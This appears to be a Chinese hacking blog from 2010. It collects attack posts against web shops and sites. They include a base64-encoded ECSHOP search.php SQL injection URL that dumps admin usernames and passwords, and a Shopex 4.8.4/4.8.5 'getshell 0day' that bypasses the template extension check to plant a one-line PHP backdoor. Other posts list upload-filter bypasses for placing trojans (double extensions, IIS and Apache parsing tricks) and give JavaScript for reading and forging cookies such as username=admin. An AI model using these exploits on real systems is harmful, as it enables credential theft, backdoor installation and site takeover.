2010年6月4日星期五

2010年5月19日星期三

【原创】ECSHOP search.php exp 变种

基于 http://www.t00ls.net/redirect-7563.html  的变种exp~~
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

2010年4月26日星期一

【原创】Shopex V4.8.4 V4.8.5 后台拿Shell 0Days

2010年4月25号 10:42am T00ls 首发
作者:alibaba

ctl.template.php :
function saveContent(){
if(strtolower(substr($_POST['file'],-4,4))=='.php') $_POST['file']='index.html';//只验证最后4位数
$this->begin('index.php?ctl=system/template&act=edit&p[0]='.$_POST['theme']);
$o = $this->system->loadModel('system/template');
$template=array(
'tpl_name'=>$_POST['file_name'],
'tpl_file'=>$_POST['file'],
'tpl_theme'=>$_POST['theme'],
'tpl_type'=>$_POST['type']
);

利用方法:
构造一个上传页面, 提交文件后缀为 .php5(linux) 或在 .php 后面加上一个空格(windows)就能绕过验证
这里附上4.8.4 及 4.8.5 两个不同版本的上传页面:
484-485.zip
成功上传后生成一句话后门 - http://站点/home/cache/t00ls-1.php5

2010年2月3日星期三

上传漏洞

很多网站都能让用户上传文件,我们就可以尝试以下方法上传后门:

1. 直接上传木马。
2. 上传时在后缀加空格或加几点。

木马.asp 这里后面有一个空格
木马.asp..
3. 双重扩展名:
木马.jpg.asp
4. IIS 漏洞
木马.asp;1.jpg
5. Apache 漏洞
木马.php.jpg

Cookies 显示及修改

在网址栏打上这个代码:
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie

在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)